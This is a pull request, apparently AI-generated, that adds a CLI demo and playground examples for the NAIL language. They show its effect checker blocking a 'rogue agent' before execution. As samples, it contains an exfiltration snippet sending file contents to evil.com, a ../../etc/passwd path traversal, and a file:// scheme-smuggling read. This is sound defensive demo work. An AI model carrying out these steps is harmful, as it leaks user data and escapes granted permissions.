### PR TITLE
feat: Rogue Agent demo — effect system showcase

### DIFF
--- a/demos/rogue_agent_demo.py
+++ b/demos/rogue_agent_demo.py
@@ -1,0 +1,241 @@
+#!/usr/bin/env python3
+"""
+Rogue Agent Demo — NAIL Effect System Showcase
+================================================
+Three escalating scenarios where an AI agent attempts to exceed its
+permissions.  NAIL's effect system catches every attempt at check time
+— before a single byte hits the network or the wrong file is opened.
+
+Run: python demos/rogue_agent_demo.py
+"""
+
+import json, sys, tempfile, textwrap
+from pathlib import Path
+
+sys.path.insert(0, str(Path(__file__).resolve().parents[1]))
+from interpreter import Checker, Runtime, CheckError
+from interpreter.types import NailEffectError
+
+SEP = "─" * 64
+STR_T = {"type": "string", "encoding": "utf8"}
+
+
+def section(title: str):
+    print(f"\n{'═' * 64}")
+    print(f"  {title}")
+    print(f"{'═' * 64}")
+
+
+def check_nail(spec: dict, label: str) -> bool:
+    raw = json.dumps(spec, sort_keys=True, separators=(",", ":"))
+    try:
+        Checker(spec, raw_text=raw).check()
+        print(f"  ✅ NAIL checker: PASSED  ({label})")
+        return True
+    except (CheckError, NailEffectError) as e:
+        print(f"  ❌ NAIL checker: CAUGHT  ({label})")
+        print(f"     → {e}")
+        return False
+
+
+# ══════════════════════════════════════════════════════════════════════
+# Scenario 1 — Data Exfiltration
+# ══════════════════════════════════════════════════════════════════════
+section("Scenario 1: Data Exfiltration")
+
+print(textwrap.dedent("""\
+  The agent is asked to "summarise a file".
+  It reads the file — then secretly sends the contents to an external
+  server via http_get.
+
+  Without NAIL (Python):
+  ──────────────────────
+  def summarise(path):
+      data = open(path).read()
+      requests.get(f"https://evil.com/steal?d={data}")  # hidden exfil
+      return data[:100] + "..."
+
+  Nothing in Python stops this.  The function signature says nothing
+  about network access — the exfiltration is invisible to the caller.
+"""))
+
+print(f"  {SEP}")
+print("  With NAIL — function declares only FS effect:")
+print(f"  {SEP}")
+
+# Agent's function declares FS only — but tries to use http_get (NET)
+nail_exfil_blocked = {
+    "nail": "0.4", "kind": "fn", "id": "summarise",
+    "effects": ["FS"],          # only FS declared
+    "params": [{"id": "path", "type": STR_T}],
+    "returns": STR_T,
+    "body": [
+        {"op": "read_file", "path": {"ref": "path"}, "effect": "FS", "into": "data"},
+        # Rogue: tries to exfiltrate via http_get — but NET is not declared!
+        {"op": "http_get", "url": {"lit": "https://evil.com/steal"}, "effect": "NET", "into": "_"},
+        {"op": "return", "val": {"ref": "data"}},
+    ],
+}
+check_nail(nail_exfil_blocked, "http_get in FS-only function → BLOCKED")
+
+print()
+
+# Correct version — FS only, no network call
+nail_exfil_correct = {
+    "nail": "0.4", "kind": "fn", "id": "summarise",
+    "effects": ["FS"],
+    "params": [{"id": "path", "type": STR_T}],
+    "returns": STR_T,
+    "body": [
+        {"op": "read_file", "path": {"ref": "path"}, "effect": "FS", "into": "data"},
+        {"op": "return", "val": {"ref": "data"}},
+    ],
+}
+check_nail(nail_exfil_correct, "legitimate FS-only summarise → PASSED")
+
+
+# ══════════════════════════════════════════════════════════════════════
+# Scenario 2 — Path Traversal
+# ══════════════════════════════════════════════════════════════════════
+section("Scenario 2: Path Traversal")
+
+# Create a real temp directory with a safe file for the runtime demo
+tmpdir = tempfile.mkdtemp(prefix="nail_demo_")
+safe_dir = Path(tmpdir) / "data"
+safe_dir.mkdir()
+safe_file = safe_dir / "report.txt"
+safe_file.write_text("Quarterly earnings: $42M", encoding="utf-8")
+
+print(textwrap.dedent(f"""\
+  The agent has read access to {safe_dir}/
+  It tries to escape via path traversal: ../../etc/passwd
+
+  Without NAIL (Python):
+  ──────────────────────
+  def read_report(path):
+      return open(path).read()      # no sandbox — ../../etc/passwd works
+
+  Nothing stops the traversal.  The OS happily resolves the path.
+"""))
+
+print(f"  {SEP}")
+print("  With NAIL — fine-grained FS capability:")
+print(f"  {SEP}")
+
+# Agent tries to read outside the allowed directory
+nail_traversal_blocked = {
+    "nail": "0.4", "kind": "fn", "id": "read_report",
+    "effects": [{"kind": "FS", "allow": [str(safe_dir)], "ops": ["read"]}],
+    "params": [],
+    "returns": STR_T,
+    "body": [
+        {"op": "read_file",
+         "path": {"lit": str(safe_dir / "../../etc/passwd")},
+         "effect": "FS", "into": "secret"},
+        {"op": "return", "val": {"ref": "secret"}},
+    ],
+}
+check_nail(nail_traversal_blocked, "path traversal ../../etc/passwd → BLOCKED")
+
+print()
+
+# Legitimate access — file within the allowed directory
+nail_traversal_legit = {
+    "nail": "0.4", "kind": "fn", "id": "read_report",
+    "effects": [{"kind": "FS", "allow": [str(safe_dir)], "ops": ["read"]}],
+    "params": [],
+    "returns": STR_T,
+    "body": [
+        {"op": "read_file",
+         "path": {"lit": str(safe_file)},
+         "effect": "FS", "into": "contents"},
+        {"op": "return", "val": {"ref": "contents"}},
+    ],
+}
+passed = check_nail(nail_traversal_legit, "read within allowed dir → PASSED")
+
+if passed:
+    raw = json.dumps(nail_traversal_legit, sort_keys=True, separators=(",", ":"))
+    result = Runtime(nail_traversal_legit).run()
+    print(f"  📄 Runtime result: {result!r}")
+
+# Cleanup
+import shutil
+shutil.rmtree(tmpdir, ignore_errors=True)
+
+
+# ══════════════════════════════════════════════════════════════════════
+# Scenario 3 — Scheme Smuggling
+# ══════════════════════════════════════════════════════════════════════
+section("Scenario 3: Scheme Smuggling")
+
+print(textwrap.dedent("""\
+  The agent has NET access (http/https only).
+  It tries to abuse http_get with a file:// URL to read local files.
+
+  Without NAIL (Python):
+  ──────────────────────
+  import urllib.request
+  urllib.request.urlopen("file:///etc/passwd").read()  # works!
+
+  Python's urllib happily opens local files via file:// scheme.
+"""))
+
+print(f"  {SEP}")
+print("  With NAIL — scheme validation on http_get:")
+print(f"  {SEP}")
+
+# Agent tries file:// scheme via http_get
+nail_scheme_blocked = {
+    "nail": "0.4", "kind": "fn", "id": "sneaky_read",
+    "effects": [{"kind": "NET", "allow": ["example.com"]}],
+    "params": [],
+    "returns": STR_T,
+    "body": [
+        {"op": "http_get",
+         "url": {"lit": "file:///etc/passwd"},
+         "effect": "NET", "into": "secret"},
+        {"op": "return", "val": {"ref": "secret"}},
+    ],
+}
+check_nail(nail_scheme_blocked, "file:// via http_get → BLOCKED")
+
+print()
+
+# Legitimate https access
+nail_scheme_legit = {
+    "nail": "0.4", "kind": "fn", "id": "fetch_data",
+    "effects": [{"kind": "NET", "allow": ["api.example.com"], "ops": ["get"]}],
+    "params": [],
+    "returns": STR_T,
+    "body": [
+        {"op": "http_get",
+         "url": {"lit": "https://api.example.com/data"},
+         "effect": "NET", "into": "body"},
+        {"op": "return", "val": {"ref": "body"}},
+    ],
+}
+check_nail(nail_scheme_legit, "https to allowed domain → PASSED")
+
+
+# ══════════════════════════════════════════════════════════════════════
+# Summary
+# ══════════════════════════════════════════════════════════════════════
+section("Summary")
+print(textwrap.dedent("""\
+  NAIL's effect system stops rogue agents before execution:
+
+  ┌─────────────────────────────┬───────────────────┬──────────────────┐
+  │ Attack vector               │ Python (runtime)  │ NAIL (pre-exec)  │
+  ├─────────────────────────────┼───────────────────┼──────────────────┤
+  │ Data exfiltration via NET   │ No protection     │ Effect mismatch  │
+  │ Path traversal (../../)     │ No protection     │ FS capability    │
+  │ Scheme smuggling (file://)  │ No protection     │ Scheme check     │
+  └─────────────────────────────┴───────────────────┴──────────────────┘
+
+  Key insight: NAIL enforces the principle of least privilege at the
+  language level.  An agent that declares ["FS"] cannot touch the network.
+  An agent scoped to /tmp/data/ cannot escape to /etc/passwd.
+
+  "The contract is checked before the code runs — not after the damage."
+"""))

--- a/playground/app.js
+++ b/playground/app.js
@@ -286,6 +286,89 @@ const EXAMPLES = {
     }
   },
 
+  // ── Rogue Agent examples ────────────────────────────────────────────────
+
+  rogue_exfil: {
+    label: "Rogue: Data Exfiltration",
+    group: "Rogue Agent",
+    description: "An agent is asked to summarise a file. It reads it (FS) — then secretly tries to send the data to an external server via http_get (NET). NAIL catches this: the function only declares FS, so any NET operation is rejected at check time. Try it — the checker will block the exfiltration before any code runs.",
+    args: {},
+    program: {
+      "nail": "0.4.0",
+      "kind": "fn",
+      "id": "summarise",
+      "effects": ["FS"],
+      "params": [{ "id": "path", "type": { "type": "string", "encoding": "utf8" } }],
+      "returns": { "type": "string", "encoding": "utf8" },
+      "body": [
+        { "op": "read_file", "path": { "ref": "path" }, "effect": "FS", "into": "data" },
+        { "op": "http_get", "url": { "lit": "https://evil.com/steal" }, "effect": "NET", "into": "_resp" },
+        { "op": "return", "val": { "ref": "data" } }
+      ]
+    }
+  },
+
+  rogue_exfil_safe: {
+    label: "Safe: FS-only Summarise",
+    group: "Rogue Agent",
+    description: "The safe version: the agent only reads the file and returns it. No network calls. The checker passes because the body only uses FS operations, matching the declared effects.",
+    args: {},
+    program: {
+      "nail": "0.4.0",
+      "kind": "fn",
+      "id": "summarise",
+      "effects": [
+        { "kind": "FS", "allow": ["/tmp/"], "ops": ["read"] },
+        "IO"
+      ],
+      "params": [],
+      "returns": { "type": "unit" },
+      "body": [
+        { "op": "read_file", "path": { "lit": "/tmp/nail_demo.txt" }, "effect": "FS", "into": "data" },
+        { "op": "print", "val": { "op": "concat", "l": { "lit": "Summary: " }, "r": { "ref": "data" } }, "effect": "IO" },
+        { "op": "return", "val": { "lit": null, "type": { "type": "unit" } } }
+      ]
+    }
+  },
+
+  rogue_traversal: {
+    label: "Rogue: Path Traversal",
+    group: "Rogue Agent",
+    description: "The agent has read access to /tmp/ only. It tries to escape via path traversal (../../etc/passwd). NAIL's fine-grained FS capability resolves the path and rejects it — the real path is outside the allowed directory.",
+    args: {},
+    program: {
+      "nail": "0.4.0",
+      "kind": "fn",
+      "id": "read_report",
+      "effects": [{ "kind": "FS", "allow": ["/tmp/"], "ops": ["read"] }],
+      "params": [],
+      "returns": { "type": "string", "encoding": "utf8" },
+      "body": [
+        { "op": "read_file", "path": { "lit": "/tmp/data/../../etc/passwd" }, "effect": "FS", "into": "secret" },
+        { "op": "return", "val": { "ref": "secret" } }
+      ]
+    }
+  },
+
+  rogue_scheme: {
+    label: "Rogue: Scheme Smuggling",
+    group: "Rogue Agent",
+    description: "The agent has NET access (http/https). It abuses http_get with a file:// URL to read local files. NAIL's scheme validation blocks this — only http and https are permitted, regardless of any NET capability declared.",
+    args: {},
+    program: {
+      "nail": "0.4.0",
+      "kind": "fn",
+      "id": "sneaky_read",
+      "effects": [{ "kind": "NET", "allow": ["example.com"] }],
+      "params": [],
+      "returns": { "type": "string", "encoding": "utf8" },
+      "body": [
+        { "op": "http_get", "url": { "lit": "file:///etc/passwd" }, "effect": "NET", "into": "secret" },
+        { "op": "return", "val": { "ref": "secret" } }
+      ]
+    }
+  },
+
   // ── v0.5 examples ──────────────────────────────────────────────────────
 
   enum_adt: {


### PR DESCRIPTION
## Summary

NAILのエフェクトシステムがAIエージェントの暴走をどう防ぐかを直感的に示すデモを追加。CLIデモとプレイグラウンドの両方で、3つの攻撃ベクトルがチェック時にブロックされる様子を体験できる。

### 追加内容

- **`demos/rogue_agent_demo.py`** — CLIデモ（3シナリオ、段階的にエスカレート）
- **`playground/app.js`** — プレイグラウンドに「Rogue Agent」グループ（4例）を追加

### 3つのシナリオ

| 攻撃ベクトル | 手法 | NAILの防御 |
|---|---|---|
| Data Exfiltration | FS-only関数が`http_get`(NET)を実行 | エフェクト不一致で拒否 |
| Path Traversal | `/tmp/data/`スコープから`../../etc/passwd`へ脱出 | FSケイパビリティがパス走査をブロック |
| Scheme Smuggling | `http_get`で`file:///etc/passwd`を指定 | スキーム検証がhttp/https以外を拒否 |

### 核メッセージ

> "The contract is checked before the code runs — not after the damage."

NAILは最小権限の原則を言語レベルで強制する。`["FS"]`を宣言した関数はネットワークに触れない。`/tmp/data/`にスコープされた関数は`/etc/passwd`に脱出できない。すべて**実行前**にチェッカーが止める。

## Test plan

- [x] `python3 demos/rogue_agent_demo.py` — 全シナリオでチェッカーが適切にブロック、正常ケースはPASS、exitコード0
- [x] プレイグラウンド4例すべてのNAILスペックをChecker経由で検証済み（不正3例→エラー、安全1例→パス）
- [ ] プレイグラウンドサーバーを起動してブラウザで「Rogue Agent」グループの動作を確認

🤖 Generated with [Claude Code](https://claude.ai/claude-code) by Claude Opus 4.6